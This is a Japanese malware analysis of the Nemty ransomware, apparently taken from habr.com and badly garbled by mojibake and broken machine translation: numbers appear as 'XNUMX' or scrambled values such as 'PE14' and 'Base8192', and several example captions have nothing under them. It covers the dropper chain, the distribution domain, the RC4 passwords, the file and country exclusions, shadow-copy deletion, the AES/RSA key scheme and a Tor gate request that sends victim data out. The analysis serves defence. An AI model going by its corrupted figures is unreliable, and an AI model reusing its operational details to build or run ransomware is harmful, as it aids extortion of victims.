Nemty ãšåŒã°ããæ°ããã©ã³ãµã ãŠã§ã¢ããããã¯ãŒã¯äžã«åºçŸããŸãããããã¯ãããã GrandCrab ãŸã㯠Buran ã®åŸç¶ã§ãã ãã®ãã«ãŠã§ã¢ã¯äž»ã«åœã® PayPal Web ãµã€ãããé åžãããŠãããå€ãã®èå³æ·±ãæ©èœãåããŠããŸãã ãã®ã©ã³ãµã ãŠã§ã¢ãã©ã®ããã«æ©èœãããã«ã€ããŠã®è©³çŽ°ã¯ãŸã æããã«ãããŠããŸããã
æ°ãã Nemty ã©ã³ãµã ãŠã§ã¢ããŠãŒã¶ãŒã«ãã£ãŠçºèŠãããŸãã
Nemty ã«é¢ããããã€ãã®èå³æ·±ãäºå®ã¯ãNemty ãåã人ç©ããŸã㯠Buran ãš GrandCrab ã«é¢é£ãããµã€ããŒç¯çœªè ã«ãã£ãŠéçºãããããšã瀺åããŠããŸãã
- GandCrab ãšåæ§ã«ãNemty ã«ãã€ãŒã¹ã¿ãŒãšãã°ãä»ããŠããŸããããã¯ããã·ã¢ã®ãŠã©ãžãŒãã«ã»ããŒãã³å€§çµ±é ã®åçãžã®ãªã³ã¯ã§ãããåç¥ãªãžã§ãŒã¯ãå«ãŸããŠããŸãã åŸæ¥ã® GandCrab ã©ã³ãµã ãŠã§ã¢ã«ã¯ãåãããã¹ããå«ãŸããç»åããããŸããã
- äž¡æ¹ã®ããã°ã©ã ã®èšèªææç©ã¯ãåããã·ã¢èªã話ãäœè ãæããŸãã
- ããã¯ã8092 ããã RSA ããŒã䜿çšããæåã®ã©ã³ãµã ãŠã§ã¢ã§ãã ããã«ã¯æå³ããããŸãããããããã³ã°ãé²ãã«ã¯ 1024 ãããã®ããŒã§ååã§ãã
- Buran ãšåæ§ãã©ã³ãµã ãŠã§ã¢ã¯ Object Pascal ã§æžãããBorland Delphi ã§ã³ã³ãã€ã«ãããŠããŸãã
éç解æ
æªæã®ããã³ãŒãã®å®è¡ã¯ 32 ã€ã®æ®µéã§çºçããŸãã æåã®ã¹ãããã¯ãMS Windows äžã§ãµã€ãº 1198936 ãã€ãã® PE14 å®è¡å¯èœãã¡ã€ã«ãcashback.exe ãå®è¡ããããšã§ãã ãã®ã³ãŒã㯠Visual C++ ã§æžããã2013 幎 XNUMX æ XNUMX æ¥ã«ã³ã³ãã€ã«ãããŸããã ããã«ã¯ãCashback.exe ãå®è¡ãããšèªåçã«è§£åãããã¢ãŒã«ã€ããå«ãŸããŠããŸãã ãã®ãœãããŠã§ã¢ã¯ãCabinet.dll ã©ã€ãã©ãªãšãã®é¢æ° FDICreate()ãFDIDestroy() ãªã©ã䜿çšããŠã.cab ã¢ãŒã«ã€ããããã¡ã€ã«ãååŸããŸãã
SHA-256: A127323192ABED93AED53648D03CA84DE3B5B006B641033EB46A520B7A3C16FC
ã¢ãŒã«ã€ãã解åãããšãXNUMX ã€ã®ãã¡ã€ã«ã衚瀺ãããŸãã
次ã«ãtemp.exe ãèµ·åãããŸããããã¯ãMS Windows äžã§ãµã€ãºã 32 ãã€ãã® PE307200 å®è¡å¯èœãã¡ã€ã«ã§ãã ã³ãŒã㯠Visual C++ ã§èšè¿°ãããUPX ã«äŒŒãããã«ãŒã§ãã MPRESS ããã«ãŒã§ããã±ãŒãžåãããŠããŸãã
SHA-256: EBDBA4B1D1DE65A1C6B14012B674E7FA7F8C5F5A8A5A2A9C3C338F02DD726AAD
次ã®ã¹ãããã¯ãironman.exe ã§ãã temp.exe ãèµ·åããããšãtemp ã«åã蟌ãŸããããŒã¿ã埩å·åããããã®ååã 32 ãã€ãã® PE544768 å®è¡å¯èœãã¡ã€ã« Ironman.exe ã«å€æŽãããŸãã ã³ãŒã㯠Borland Delphi ã§ã³ã³ãã€ã«ãããŸãã
SHA-256: 2C41B93ADD9AC5080A12BF93966470F8AB3BDE003001492A10F63758867F2A88
æåŸã®ã¹ãããã¯ãironman.exe ãã¡ã€ã«ãåèµ·åããããšã§ãã å®è¡æã«ã³ãŒããå€æããã¡ã¢ãªããèªèº«ãå®è¡ããŸãã ãã®ããŒãžã§ã³ã® Ironman.exe ã¯æªæããããæå·åãæ åœããŸãã
æ»æãã¯ãã«
çŸåšãNemty ã©ã³ãµã ãŠã§ã¢ã¯ Web ãµã€ã pp-back.info ãéããŠé åžãããŠããŸãã
ææã®å®å
šãªé£éã¯æ¬¡ã®å Žæã§ç¢ºèªã§ããŸãã
ã€ã³ã¹ããŒã«
Cashback.exe - æ»æã®å§ãŸãã ãã§ã«è¿°ã¹ãããã«ãCashback.exe ã¯ãããã«å«ãŸãã .cab ãã¡ã€ã«ã解åããŸãã 次ã«ã%TEMP%IXxxx.TMP ãšãã圢åŒã®ãã©ã«ã㌠TMP4351$.TMP ãäœæãããŸããxxx 㯠001 ïœ 999 ã®æ°åã§ãã
次ã«ã次ã®ãããªã¬ãžã¹ã㪠ããŒãã€ã³ã¹ããŒã«ãããŸãã
ãrundll32.exeããC:Windowssystem32advpack.dll,DelNodeRunDLL32ãC:UsersMALWAR~1AppDataLocalTempIXPxxx.TMPãã
解åããããã¡ã€ã«ãåé€ããããã«äœ¿çšãããŸãã æåŸã«ãCashback.exe 㯠temp.exe ããã»ã¹ãéå§ããŸãã
Temp.exe ã¯ææãã§ãŒã³ã®ç¬¬ XNUMX 段éã§ã
ããã¯ãCashback.exe ãã¡ã€ã«ã«ãã£ãŠèµ·åãããããã»ã¹ã§ããããŠã€ã«ã¹å®è¡ã® XNUMX çªç®ã®ã¹ãããã§ãã Windows äžã§ã¹ã¯ãªãããå®è¡ããããŒã«ã§ãã AutoHotKey ãããŠã³ããŒãããPE ãã¡ã€ã«ã®ãªãœãŒã¹ ã»ã¯ã·ã§ã³ã«ãã WindowSpy.ahk ã¹ã¯ãªãããå®è¡ããããšããŸãã
WindowSpy.ahk ã¹ã¯ãªããã¯ãRC4 ã¢ã«ãŽãªãºã ãšãã¹ã¯ãŒã IwantAcake ã䜿çšããŠãironman.exe å
ã®äžæãã¡ã€ã«ã埩å·åããŸãã ãã¹ã¯ãŒãããã®ããŒã¯ãMD5 ããã·ã¥ ã¢ã«ãŽãªãºã ã䜿çšããŠååŸãããŸãã
次ã«ãtemp.exe 㯠Ironman.exe ããã»ã¹ãåŒã³åºããŸãã
Ironman.exe - XNUMX çªç®ã®ã¹ããã
Ironman.exe ã¯ãiron.bmp ãã¡ã€ã«ã®å 容ãèªã¿åãã次ã«èµ·åããã cryptolocker ãå«ã Iron.txt ãã¡ã€ã«ãäœæããŸãã
ãã®åŸããŠã€ã«ã¹ã¯ Iron.txt ãã¡ã¢ãªã«ããŒãããironman.exe ãšããŠåèµ·åããŸãã ãã®åŸãiron.txtã¯åé€ãããŸãã
Ironman.exe 㯠NEMTY ã©ã³ãµã ãŠã§ã¢ã®äž»èŠéšåã§ããã圱é¿ãåããã³ã³ãã¥ãŒã¿äžã®ãã¡ã€ã«ãæå·åããŸãã ãã«ãŠã§ã¢ã¯ããã€ããšåŒã°ãããã¥ãŒããã¯ã¹ãäœæããŸãã
æåã«ãã³ã³ãã¥ãŒã¿ã®å°ççäœçœ®ãç¹å®ããŸãã Nemty ã¯ãã©ãŠã¶ãéã㊠IP ã確èªããŸãã
- ãã·ã¢
- ãã©ã«ãŒã·
- ãŠã¯ã©ã€ã
- ã«ã¶ãã¹ã¿ã³
- ã¿ãžãã¹ã¿ã³
ãããããéçºè ã¯å± äœåœã®æ³å·è¡æ©é¢ã®æ³šç®ãéããããªãããããæ¬åœãã®ç®¡èœåºåã§ã¯ãã¡ã€ã«ãæå·åããŸããã
被害è ã® IP ã¢ãã¬ã¹ãäžèšã®ãªã¹ãã«å±ããªãå ŽåããŠã€ã«ã¹ã¯ãŠãŒã¶ãŒã®æ å ±ãæå·åããŸãã
ãã¡ã€ã«ã®å埩ãé²ãããã«ãã·ã£ã㊠ã³ããŒã¯åé€ãããŸãã
次ã«ãæå·åãããªããã¡ã€ã«ãšãã©ã«ããŒã®ãªã¹ããããã³ãã¡ã€ã«æ¡åŒµåã®ãªã¹ããäœæãããŸãã
- ãŠã£ã³ããŠãº
- $ RECYCLE.BIN
- RSA
- NTDETECT.COM
- ntldr
- MSDOS.SYS
- IO.SYS
- boot.ini AUTOEXEC.BAT ntuser.dat
- Desktop.iniã®
- ã·ã¹ãã æ§æã
- ããŒãã»ã¯ãBAK
- BOOTMGR
- ããã°ã©ã ããŒã¿
- appdata
- ãªãœãã
- äžè¬çãªãã¡ã€ã«
log LOG CAB cab CMD cmd COM com cpl
CPL exe EXE ini INI dll DDL lnk LNK url
URL ttf TTF DECRYPT.txt NEMTY
é£èªå
URL ãšåã蟌ã¿æ§æããŒã¿ãé衚瀺ã«ããããã«ãNemty ã¯ãfuckav ããŒã¯ãŒãã䜿çšããŠãbase64 ããã³ RC4 ãšã³ã³ãŒã ã¢ã«ãŽãªãºã ã䜿çšããŸãã
CryptStringToBinaryã䜿çšãã埩å·åããã»ã¹ã¯æ¬¡ã®ãšããã§ãã
КОÑÑПваМОе
Nemty 㯠XNUMX å±€æå·åã䜿çšããŸãã
- ãã¡ã€ã«ã®å Žå㯠AES-128-CBCã 128 ããã AES ããŒã¯ã©ã³ãã ã«çæããããã¹ãŠã®ãã¡ã€ã«ã«åãããã«äœ¿çšãããŸãã ããã¯ããŠãŒã¶ãŒã®ã³ã³ãã¥ãŒã¿äžã®æ§æãã¡ã€ã«ã«ä¿åãããŸãã IV ã¯ãã¡ã€ã«ããšã«ã©ã³ãã ã«çæãããæå·åããããã¡ã€ã«ã«ä¿åãããŸãã
- ãã¡ã€ã«æå·åçšã® RSA-2048 IV. ã»ãã·ã§ã³ã®ããŒãã¢ãçæãããŸãã ã»ãã·ã§ã³ã®ç§å¯ããŒã¯ããŠãŒã¶ãŒã®ã³ã³ãã¥ãŒã¿äžã®æ§æãã¡ã€ã«ã«ä¿åãããŸãã
- RSA-8192ã ãã¹ã¿ãŒå ¬éããŒã¯ããã°ã©ã ã«çµã¿èŸŒãŸããŠãããRSA-2048 ã»ãã·ã§ã³ã® AES ããŒãšç§å¯ããŒãä¿åããæ§æãã¡ã€ã«ã®æå·åã«äœ¿çšãããŸãã
- Nemty ã¯æåã« 32 ãã€ãã®ã©ã³ãã ããŒã¿ãçæããŸãã æåã® 16 ãã€ã㯠AES-128-CBC ããŒãšããŠäœ¿çšãããŸãã
2048 çªç®ã®æå·åã¢ã«ãŽãªãºã 㯠RSA-XNUMX ã§ãã ã㌠ãã¢ã¯ CryptGenKey() é¢æ°ã«ãã£ãŠçæãããCryptImportKey() é¢æ°ã«ãã£ãŠã€ã³ããŒããããŸãã
ã»ãã·ã§ã³ã®ã㌠ãã¢ãçæããããšãå
¬éããŒã MS æå·åãµãŒãã¹ ãããã€ããŒã«ã€ã³ããŒããããŸãã
ã»ãã·ã§ã³çšã«çæãããå
¬éããŒã®äŸ:
次ã«ãç§å¯ããŒã CSP ã«ã€ã³ããŒããããŸãã
ã»ãã·ã§ã³çšã«çæãããç§å¯ããŒã®äŸ:
ãããŠæåŸã¯ RSA-8192 ã§ãã ã¡ã€ã³ã®å
¬éããŒã¯ãæå·åãããåœ¢åŒ (Base64 + RC4) 㧠PE ãã¡ã€ã«ã® .data ã»ã¯ã·ã§ã³ã«ä¿åãããŸãã
Base8192 埩å·åãšãfuckav ãã¹ã¯ãŒãã䜿çšãã RC64 埩å·ååŸã® RSA-4 ããŒã¯æ¬¡ã®ããã«ãªããŸãã
ãã®çµæãæå·åããã»ã¹å
šäœã¯æ¬¡ã®ããã«ãªããŸãã
- ãã¹ãŠã®ãã¡ã€ã«ã®æå·åã«äœ¿çšããã 128 ããã AES ããŒãçæããŸãã
- ãã¡ã€ã«ããšã« IV ãäœæããŸãã
- RSA-2048 ã»ãã·ã§ã³ã®ã㌠ãã¢ãäœæããŸãã
- Base8192 ãš RC64 ã䜿çšããæ¢åã® RSA-4 ããŒã®åŸ©å·åã
- æåã®ã¹ããããã AES-128-CBC ã¢ã«ãŽãªãºã ã䜿çšããŠãã¡ã€ã«ã®å 容ãæå·åããŸãã
- RSA-2048 å ¬éããŒãš Base64 ãšã³ã³ãŒãã䜿çšãã IV æå·åã
- æå·åããã IV ãåæå·åãã¡ã€ã«ã®æ«å°Ÿã«è¿œå ããŸãã
- AES ããŒãš RSA-2048 ã»ãã·ã§ã³ç§å¯ããŒãæ§æã«è¿œå ããŸãã
- ã»ã¯ã·ã§ã³ã§èª¬æãããŠããæ§æããŒã¿
æ å ±åé ææããã³ã³ãã¥ãŒã¿ã«é¢ããæ å ±ã¯ãã¡ã€ã³å ¬éã㌠RSA-8192 ã䜿çšããŠæå·åãããŸãã - æå·åããããã¡ã€ã«ã¯æ¬¡ã®ããã«ãªããŸãã
æå·åããããã¡ã€ã«ã®äŸ:
ææããã³ã³ãã¥ãŒã¿ã«é¢ããæ å ±ã®åé
ã©ã³ãµã ãŠã§ã¢ã¯ææãããã¡ã€ã«ã埩å·ããããã®ããŒãåéãããããæ»æè ã¯å®éã«åŸ©å·ããã°ã©ã ãäœæã§ããŸãã ããã«ãNemty ã¯ãŠãŒã¶ãŒåãã³ã³ãã¥ãŒã¿ãŒåãããŒããŠã§ã¢ ãããã¡ã€ã«ãªã©ã®ãŠãŒã¶ãŒ ããŒã¿ãåéããŸãã
GetLogicalDrives()ãGetFreeSpace()ãGetDriveType() é¢æ°ãåŒã³åºããŠãææããã³ã³ãã¥ãŒã¿ã®ãã©ã€ãã«é¢ããæ
å ±ãåéããŸãã
åéãããæ å ±ã¯æ§æãã¡ã€ã«ã«ä¿åãããŸãã æååããã³ãŒããããšãæ§æãã¡ã€ã«å ã®ãã©ã¡ãŒã¿ã®ãªã¹ããååŸãããŸãã
ææããã³ã³ãã¥ãŒã¿ã®æ§æäŸ:
æ§æãã³ãã¬ãŒãã¯æ¬¡ã®ããã«è¡šãããšãã§ããŸãã
{"å šè¬": {"IP":"[IP]"ã"åœ":"[åœ]"ã"ã³ã³ãã¥ãŒã¿ãŒå":"[ã³ã³ãã¥ãŒã¿ãŒå]"ã"ãŠãŒã¶ãŒå":"[ãŠãŒã¶ãŒå]"ã"OS": "[OS]"ã"isRU":falseã"ããŒãžã§ã³":"1.4"ã"CompID":"{[CompID]}"ã"FileID":"_NEMTY_[FileID]_"ã"UserID":"[ãŠãŒã¶ãŒID]"ã"key":"[key]"ã"pr_key":"[pr_key]
Nemty ã¯ãåéããããŒã¿ã JSON 圢åŒã§ãã¡ã€ã« %USER%/_NEMTY_.nemty ã«ä¿åããŸãã FileID 㯠7 æåã®é·ãã§ãã©ã³ãã ã«çæãããŸãã äŸ: _NEMTY_tgdLYrd_.nemtyã FileID ã¯ãæå·åããããã¡ã€ã«ã®æ«å°Ÿã«ãè¿œå ãããŸãã
身代éã¡ãã»ãŒãž
ãã¡ã€ã«ãæå·åãããšã次ã®å 容ãå«ããã¡ã€ã« _NEMTY_[FileID]-DECRYPT.txt ããã¹ã¯ãããã«è¡šç€ºãããŸãã
ãã¡ã€ã«ã®æåŸã«ã¯ãææããã³ã³ãã¥ãŒã¿ã«é¢ããæå·åãããæ
å ±ãå«ãŸããŠããŸãã
ãããã¯ãŒã¯éä¿¡
Ironman.exe ããã»ã¹ã¯ã次ã®ã¢ãã¬ã¹ãã Tor ãã©ãŠã¶ã®ãã£ã¹ããªãã¥ãŒã·ã§ã³ãããŠã³ããŒãããŸãã
次ã«ãNemty ã¯æ§æããŒã¿ã 127.0.0.1:9050 ã«éä¿¡ããããšããŸããããã§ãåäœãã Tor ãã©ãŠã¶ ãããã·ãèŠã€ãããšäºæ³ãããŸãã ãã ããããã©ã«ãã§ã¯ãTor ãããã·ã¯ããŒã 9150 ã§ãªãã¹ã³ããããŒã 9050 㯠Linux ã® Tor ããŒã¢ã³ãŸã㯠Windows ã® Expert Bundle ã«ãã£ãŠäœ¿çšãããŸãã ãããã£ãŠãæ»æè ã®ãµãŒããŒã«ããŒã¿ã¯éä¿¡ãããŸããã 代ããã«ããŠãŒã¶ãŒã¯èº«ä»£éã¡ãã»ãŒãžã§æäŸããããªã³ã¯ãä»ã㊠Tor 埩å·åãµãŒãã¹ã«ã¢ã¯ã»ã¹ããæ§æãã¡ã€ã«ãæåã§ããŠã³ããŒãã§ããŸãã
Tor ãããã·ã«æ¥ç¶ããŸã:
HTTP GET 㯠127.0.0.1:9050/public/gate?data= ãžã®ãªã¯ãšã¹ããäœæããŸã
ããã§ã¯ãTORlocal ãããã·ã«ãã£ãŠäœ¿çšãããŠããéããŠãã TCP ããŒãã確èªã§ããŸãã
Tor ãããã¯ãŒã¯äžã® Nemty 埩å·åãµãŒãã¹:
æå·åãããåç (jpgãpngãbmp) ãã¢ããããŒãããŠã埩å·åãµãŒãã¹ããã¹ãã§ããŸãã
ãã®åŸãæ»æè
ã¯èº«ä»£éã®æ¯æããèŠæ±ããŸãã æªæãã®å Žåã¯XNUMXåã®æéãšãªããŸãã
ãŸãšã
çŸæç¹ã§ã¯ã身代éãæ¯æããªãéããNemty ã«ãã£ãŠæå·åããããã¡ã€ã«ã埩å·ããããšã¯ã§ããŸããã ãã®ããŒãžã§ã³ã®ã©ã³ãµã ãŠã§ã¢ã«ã¯ãBorland Delphi ã§ã®ã³ã³ãã€ã«ãšåãããã¹ããå«ãç»åãšãããBuran ã©ã³ãµã ãŠã§ã¢ãå€ã GandCrab ãšå ±éã®æ©èœããããŸãã ããã«ããã㯠8092 ããã RSA ããŒã䜿çšããæåã®æå·åè£ çœ®ã§ããããããŸãæå³ããããŸãããä¿è·ã«ã¯ 1024 ããã ããŒã§ååã§ããããã§ãã æåŸã«ãèå³æ·±ãããšã«ãããŒã«ã« Tor ãããã· ãµãŒãã¹ã«ééã£ãããŒãã䜿çšããããšããŸãã
ãã ãã解決ç
åºæïŒ habr.com